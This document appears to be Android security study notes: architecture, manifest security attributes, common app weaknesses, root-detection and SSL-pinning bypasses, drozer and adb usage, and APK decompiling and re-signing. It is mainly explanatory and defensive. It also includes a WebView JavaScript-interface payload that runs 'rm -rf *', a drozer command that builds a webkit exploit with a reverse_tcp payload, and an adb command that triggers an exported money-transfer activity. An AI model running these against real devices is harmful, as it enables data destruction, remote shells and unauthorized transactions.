



Mobile devices

Mobile devices characteristics

  • small
  • popular - a lot of applications, a lot of users
  • always online
  • universal
    • used for personal purposes
    • used for work purposes
  • contain a lot of valuable data (passwords from enterprise, from mail, from banks, OTP, …)
  • use wireless technologies: sim, Wifi, NFC, Bluetooth

STK (SIM Toolkit) - is a standard of the GSM system which enables the Subscriber Identity Module (SIM) to initiate actions. SIM can write text to mobile, ask question to user, make a call, etc. It also can contain java apps (JavaCard).

Intruder model

  • hacker can obtain your telephone
  • hacker succesfully installed app into your telephone
  • hacker is somewhere near you and can communicate only via wireless technologies

Android system

Android security is based on sandbox concept, which is based on different UID for apps and since 4.3 uses SELinux, since 5.0 - only SELinux. Main security mechanisms are:

  • sandbox
  • application framework, implementing cryptography, permissions, secure IPC, etc.
  • ASLR, NX, ProPolice, safe_iop, OpenBSD dlmalloc, OpenBSD calloc, and Linux mmap_min_addr
  • user-granted and application-defined permissions
  • Keystore

Android IPC is based on binder mechanism that is Android RPC, for defining binder interface is used AIDL (Android Interface Definition Language). Everything goes through binder, it uses shared memory in kernel to optimize copying data from app to app.

Broadcasts can be consumed by a receivers. If you want reliable delivery specify the receiver.

Android uses Bionic libc instead of glibc.
Application consists of components, system starts/stops them automatically.
Applications is installed to /data/data/app_name; /mnt/sdcard - removable storage

Android OS structure

  • kernel (+ drivers)
  • userspace libraries and APIs written in C (ssl, libc, sqlite, opengl, …)
  • an application framework (activity manager, window manager, content providers, …)
  • application software running inside the application framework

System startup

  • bootloader
  • kernel
  • init
  • zygote (used to start applications by forking)
  • system server (starts services)
  • activity manager (looks after applications, monitors a lot, controls permissions, starts activities, services, etc.)
  • launcher (home)


java source code –> .jar –> .dex –> .apk
Android < 5.0 java applications is interpreted by Dalvik VM. (however ART was added as alternative since 4.4)
Android >= 5.0 uses ART (Android Runtime) instead. It compiles application during installation to native instructions to be faster.
Dalvik VM was a register based instead of stack based java.

Android SDK (Software Development Kit) is environment for android develope and run (emulate devices, connect to them, etc.)
To bind C functions into Java code one can use JNI (Java Native Interface) (android developers uses NDK - native development kit)

adb - android debug bridge - usb gadget driver
using APKtool, IntelliJ IDEA, android sdk and decompilation tools, you can debug application


Keystore is a class representing a storage facility for cryptographic keys and certificates. Keystore manages different types of entries: KeyStore.PrivateKeyEntry, KeyStore.SecretKeyEntry, KeyStore.TrustedCertificateEntry.

Android app structure


  • Resources
  • Manifest (describes application components, app and components permissions)

    • Intents

      • Activities
      • Servicies
      • Broadcast Receivers (can be created programmically)
    • Permissions
    • Content Providers
  • Native libs
  • Classes

Manifest security points

Manifest specification

API Google for android

  • (api >= 1) <manifest> android:installLocation - internalOnly or auto or preferExternal
  • (api >= 1) <uses-sdk> - sets minimal, maximal and target sdk version
  • (api >= 1) <application android:debuggable="true" ...> - enables to attach to process with jdb (java debugger) and gives some privileges under process (run-as, etc.).

  • (api >= 23) <uses-permission-sdk-23> - Specifies that an app wants a particular permission, but only if the app is running on a device with API level 23 or higher.
  • (api >= 1) <permission android:name="com.example.project.DEBIT_ACCT" ... /> - declaring the permission to get access to app

    • android:protectionLevel

      • normal - a lower-risk permission that gives requesting applications access to isolated application-level features
      • dangerous - a higher-risk permission that would give a requesting application access to private user data or control over the device that can negatively impact the user.
      • signature - a permission that the system grants only if the requesting application is signed with the same certificate as the application that declared the permission.
      • signatureOrSystem - a permission that the system grants only to applications that are in the Android system image or that are signed with the same certificate as the application that declared the permission.
  • (api >= 1) <uses-permission android:name="android.permission.READ_CONTACTS" /> - the tag requesting the permission

  • (api >= 4) <uses-feature> - declares types of hardware features smartphone must have (if android:required="true") and better to have (if android:required="false") (e.g. android.hardware.bluetooth)

  • (api >= 3) <uses-configuration> - indicates if it needs some types of hardware and software features.

  • (api >= 1) <service> - declares a service (a Service subclass) as one of the application’s components.
    (api >= 1) <receiver> - broadcast receiver of intents from system and other apps.
    (api >= 1) <activity> - declares an activity (an Activity subclass) that implements part of the application’s visual user interface.

    • android:enabled - be default is true - the service/receiver can be instantiated by the system

    • android:exported - indicates if the service is exposed to other apps
      service / activity - by default is not exposed, but after adding any intent filters - by default is exposed.
      receiver - by default is exposed.

    • android:isolatedProcess (only for service and receiver) - indicates that service will run under a special process that is isolated from the rest of the system and has no permissions of its own.

    • android:permission - specifies the permission caller/sender must have.
      If permission is not set, application’s <permission> element will be used. If neither are set - the service is not protected.

    • android:process - if starts with a :, a new process, private to the application, is created for service. If the process name begins with a lowercase character, the service will run in a global process of that name, provided that it has permission to do so. (allows different apps to share process, reducing resource usage)

    <activity-alias> has attributes enabled, exported and permission.

  • <protected-broadcast android:name="..."> - tells android os to allow this application get broadcast messages only from system.

  • (api >= 1) <intent-filter> - specifies the types of intents that an activity, service, or broadcast receiver can respond to.

    • android-priority - when an intent could be handled by multiple activities with different priorities
      for intent - android will consider only those with higher priority values as potential targets
      for broadcast receivers - priority controls the order in which broadcast receivers are executed to receive broadcast messages
  • (api >= 1) <provider> - supplies structured access to data managed by the application.

    • android:enabled - be default is true - the provider can be instantiated by the system
    • android:exported - indicates if the service is exposed to other apps
      if android:minSdkVersion or android:targetSdkVersion <= 16 by default provider is exposed, if >=17 - not exposed

    • android:multiprocess - by default is false, meaning instance of the content provider will not be created in every client process
    • android:permission, android:readPermission, android:writePermission - the name of a permission that clients must have to read/write the content provider’s data (last two takes precedence over the first one)
    • android:syncable - whether or not the data under the content provider’s control is to be synchronized with data on a server — “true” if it is to be synchronized, and “false” if not.

    • android:grantUriPermissions - if “true”, permission can be granted to any of the content provider’s data
      if false, enables access to resources described in <grant-uri-permission>

      Permission to access using grantUriPermissions is granted by FLAG_GRANT_READ_URI_PERMISSION and FLAG_GRANT_WRITE_URI_PERMISSION flags in the Intent object that activates the component.

      • (api >= 1) <grant-uri-permission> - if android:grantUriPermissions is false, permission can be granted only to data subsets that are specified by this tag element.
    • (api >= 4) <path-permission> - defines the path and required permissions for a specific subset of data within a content provider.

      • android:permission, android:readPermission, android:writePermission - the name of a permission that clients must have to read/write the content provider’s data (last two takes precedence over the first one)

Vulnerable android app points

  • filesystem rights:

    • on telephone card: default is MODE_PRIVATE - chmod 0660 - nobody can read your files
    • on sd card: default chmod 0755 - everybody can read your files

    • system tools for files (and not only) (e.g. touch, echo) can create them with unsecure rights (0666). Use only android API.
  • secure network connections

    • analyse traffic

      • several frameworks for “comfort” can approve any self-signed cert, or developer can forget to check matching of certificate domain and server domain, etc.

      • use signed certificates (signed with CA, not expired, not recalled, with correct domain names)

        can be bypassed for reverse engineering, by adding your own root CA

      • use pinned certificates (checking if certificate from server matches certificate stored in application (hardcoded in code or in its resources))

        • defends from CA certificate being compromised, or from adding malicious certificate to the list of trusted certificates
        • requires application update for certificate update
        • hard (but possible) to bypass for reverse engineering (SSLunpinning, android-ssl-bypass, Android-SSL-TrustKiller)

        In android version 4.4 SSLunpinning works OK

      • all trafic must be encrypted, NO exclusions (such as advertisments, news, social network, telemetry, etc.)

    • analyse server side
    • analyse client side
  • IPC - Interprocess communication

    • Content providers (allows to call application’s functionality (sometimes functionality can be critical))

      android < 4.1 - always exported
      android > 4.1 - exported on developer instructions

      content provider’s filters (conditions that must be fulfilled to have right to call content provider):

      • application signature must be from the same developer
      • by application name
      • ask user (obviously users always tap yes)

      When accessing a content provider, use parameterized query methods such as query(), update(), and delete() to avoid potential SQL injection from untrusted sources.

  • Android Intents

    • broadcast - broadcast messages handler

      android < 6.0 - any application can send a broadcast message

    • intent data must be validated

  • After getting a broadcast intent you must get sure, whom it came from.

    Before sending broadcast intent you must got sure the target component has not been replaced by malicious content.

    Commands requiring user interaction are placed in a queue (e.g. requests from sim card). Therefore after getting answer from a user via broadcast intent you can not be confident if the user has replied to exactly your’s request. There is a possibility attacker pushed his own malicious request in a queue just before you did. e.g. sim spoofing

  • Task activity hijacking (paper)

    If user already installed malicious software, it can temper with taskAffinity to redirect user from good application to malicious one (purposes: fishing, ransomware, spyware, …).

    Exists several attacking scenario’s, all are based on specifying taskAffinity to change current task and return to other activities in malicious tasks, some methods can additionaly use allowTaskReparenting=true, launchMode=singleTask and FLAG_ACTIVITY_(NEW_TASK|SINGLE_TOP|CLEAR_TOP|REORDER_TO_FRONT|NO_HISTORY|CLEAR_TASK|NEW_DOCUMENT|MULTIPLE_TASK)

    • no real mitigation way
  • application android:debuggable - permits to attach to process with jdb (java debugger) and gain some privileges under process (run-as, etc.).

  • eval equivalents in Android

    • webview javascript execution


      • setJavaScriptEnabled();
      • addJavaScriptInterface();

      in case we can inject into javascript our code we got RCE, e.g.

      JavaObject.getClass().forname("java.lang.Runtime").getMethod("getRuntime", , null).invoke(null,null).exec(["/system/bin/sh","rm","-rf","*"])

Information leaks:

  • logcat - developers could have not disabled logging - handy for app analysis

    (android < 4.1 (api 16)) - logcat can be read by any application (after api 16 each application has its own log)

  • application WebView (can store sensitive data just like a web browser)

Information leaks for application analysis:

  • application can store sensitive information in sqlite db (credentials, ip-addresses, etc)
    possible sql injections
  • application cache

Application can check if google play services installed on smartphone is up-to-date and even automatically update them. (e.g. checking provider)

Wireless attacks

  • fake cellphone stations (GSM security)
  • fake wifi hotspots (Wifi security)

    • if wifi is on, telephone always tries to connect to known hotspots
  • NFC
  • Bluetooth (headset)

SMS is not encrypted and not authenticated and can be intercepted, therefore it is absolutely insecure (nor their content, nor sender).

Android app defences

  • root detection

    Runtime checks:

    • Standart files and configurations:

      build tag: cat /system/build.prop | grep, must be equal to release-keys

      Over The Air (OTA) certificates (google certs for updates): ls -l /etc/security/

    • Search for additional components on smartphone:

      right managers: superuser.apk, com.thirdparty.superuser, eu.chainfire.supersu, com.koushikdutta.superuser, com.zachspong.temprootremovejb, com.ramdroid.appquarantine


    • Check output for user, id

    • Check filesystem rights:

      /data becomes readable

      a lot of directores at / become writable

    Bypass for analysis:

    • RootCloak (uses method hooking (exec, file i/o, getInstalledApplications, etc.)) (Xposed framework needed)
  • ssl-pinning

    procedure of storing ssl certificate of app’s server inside application to make additional checks defending from MITM

    Bypass for analysis:

    • SSLunpinning (Xposed framework module), android-ssl-bypass, Android-SSL-TrustKiller (needs root, uses method hooking)

Android security tools

Evil-Droid - Evil-Droid Framework (framework that create & generate & embed apk payload to penetrate android platforms)

Android Tamer - distributive for android security penetration testing
Koodous - platform for Android malware research (looks like infosec ecosystem)

  • debugging APK (article) (русский) - decompilation and debugging of APK
  • ProGuard - most pupular optimizer (thus obfuscator) for java bytecode

  • MobSF - Mobile Security Framework - an intelligent, all-in-one open source mobile application (Android/iOS/Windows) automated pen-testing framework capable of performing static, dynamic analysis and web API testing
    Garage4Hackers Webcast - Security Framework for Mobile Application Testing (youtube video)

  • APKiD - Android application identifier for packers, protectors, obfuscators and oddities - PEiD for Android

  • drozer - security testing framework for Android


    # 1. Generate agent application apk
    $ drozer agent build
    # 2. Launch an agent application on android device
    # 3. Forward ports from avd to host
    ./adb forward tcp:31415 tcp:31415
    # 4. run drozer (e.g. console mode)
    drozer console --server localhost:31415 connect

    General commands:

    dz> list # show all modules
    dz> run app.package.list # list all packages
    dz> run app.package.list -f test # grep list of packages
    dz> shell # run shell

    First priority commands for application analysis:

    dz> run -a
    dz> run app.package.attacksurface
    dz> run app.package.launchintent
    dz> run -a
    dz> run -a
    dz> run -a
    dz> run -a

    Permission: null - means no permissions needed to start activity/service/broadcast

    Shellcode examples (trivial example):

    $ drozer exploit list
    $ drozer shellcode list
    $ drozer exploit build exploit.remote.webkit.nanparse –-payload weasel.reverse_tcp.armeabi --server --push-server --resource /home.html
  • qark - tool designed to look for several security related Android application vulnerabilities

Triggering intents (./adb shell am -h):

  • ./adb shell am start -a android.intent.action.VIEW -c android.intent.category.DEFAULT -e foo bar -e bert ernie -n my.package.component.blah
    (in Java code extraction: extras.getString("foo"))
  • ./adb shell am start -n or am start -a com.example.ACTION_NAME -n
  • ./adb shell am broadcast -a android.intent.action.BOOT_COMPLETED -c android.intent.category.HOME -n net.fstab.checkit_android/.StartupReceiver

Android Emulators:

Enable proxy for emulators:

  • settings -> wireless & networks -> More -> Cellular networks -> Access Point Names -> T-Mobile US -> <change proxy:port> -> upper right corner -> Save
    However this method sometimes doesn’t work
  • emulator -avd myavd -http-proxy

Download APK:

APK disassemble

  • unzip -> dex2jar
  • APK Studio
  • Apktool

  • aapt.exe (…\adt-bundle\sdk\build-tools\android-4.4W\) – extract lots of information about .apk

Java decompilers

  • jd-gui
    running it under 9-th java (there can be some runtime error): java --add-opens java.base/jdk.internal.loader=ALL-UNNAMED --add-opens jdk.zipfs/jdk.nio.zipfs=ALL-UNNAMED -jar jd-gui.jar
  • cfr
  • jad
  • dex2jar - dex->jar
  • jadx - dex->java
  • BytecodeViewer - combined utility (has various backends)
  • procyon
  • Luyten
  • fernflower
  • Krakatau (python required)

Other tools:

Crib - connecting to remote android emulator

Follow this instructions precisely !!!

  • on host machine with ip = $REMOTE_IP we start android emulator (port 5554)
  • we are connecting from some guest machine
  1. Make port forwarding on guest: localhost:5554 -> $REMOTE_IP:5554 and localhost:5555 -> $REMOTE_IP:5555 (because adb server will connect to localhost)
  2. Make port forwarding on host: $REMOTE_IP:5554 -> and $REMOTE_IP:5555 -> (because emulator listen localhost:5554 but not
  3. ./adb kill-server on host machine ( – not sure if this step is needed)
  4. Restart your avd device on host machine ( – not sure if this step is needed)
  5. ./adb kill-server && ./adb connect $REMOTE_IP:5554 && ./adb devices on guest machine

    You must see available devices now. (also you can use instead of $REMOTE_IP localhost in connect command (because port forwarding works))

  • cd android-sdk/tools
  • .\android.bat list avd
  • .\emulator.exe -avd nexus-5x-api24-google-api -http-proxy
  • cd android-sdk/platform-tools
  • .\adb.exe devices -l
  • .\adb -s shell

  • adb shell dumpsys user
  • adb shell pm list users
  • adb shell am start -n com.example.nanisenya.snatch/.MoneyTransferActivity –es id 31 –es amount 1 –es receiver 80107430600227300031 –es description wow

Rebuilding android apk

  • Generate key

    keytool -genkey -v -keystore my_key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

  • Sign android apk

    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my_key.keystore app_name.apk alias_name

  • Add into keystore specified certificate

    keytool -importcert -v -trustcacerts -file "cert.der" -keystore "keystore.bks" -provider org.MyProvider -providerpath "my_app.jar" -storetype BKS -storepass testing

Simplifying OpenSSL certificate generation: /usr/lib/ssl/misc/ (debian/kali), /etc/ssl/misc/ (Arch)
/etc/ssl/openssl.cnf - default settings (change at least dir)

How to create my own certificate chain / Generate certificate chains for testing java applications